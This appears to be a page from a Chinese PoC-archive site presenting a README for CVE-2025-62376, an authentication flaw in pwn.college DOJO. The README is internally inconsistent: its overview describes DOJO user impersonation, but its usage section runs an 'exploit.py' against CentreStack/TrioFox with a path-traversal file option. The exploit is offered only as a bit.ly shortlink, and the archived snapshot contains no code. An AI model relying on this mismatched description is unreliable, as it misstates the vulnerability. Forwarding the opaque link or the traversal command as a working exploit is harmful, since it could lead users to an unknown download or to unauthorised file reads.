目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%

CVE-2025-62376 PoC — DOJO 授权问题漏洞

来源
关联漏洞
标题:DOJO 授权问题漏洞 (CVE-2025-62376)
Description:DOJO是pwn.college开源的一款JavaScript工具箱。 DOJO存在授权问题漏洞,该漏洞源于/workspace端点身份验证不当,可能导致未经授权访问Windows虚拟机。
介绍
# Improper Authentication in pwn.college DOJO Education Platform(CVE-2025-62376)

### Overview

The pwn.college DOJO platform has a vulnerability in its /workspace endpoint that allows unauthorized access to active Windows VMs. This flaw arises from the view_desktop function, which inadequately verifies user authorization. An attacker can exploit this by providing a user ID and an arbitrary password, thereby impersonating other users. 

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### PoC Exploit - [href](http://bit.ly/46VVvzl)
文件快照

[4.0K] /data/pocs/86a9c197e6bb93b54d5aeef2bbc731a999f8618c └── [ 992] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。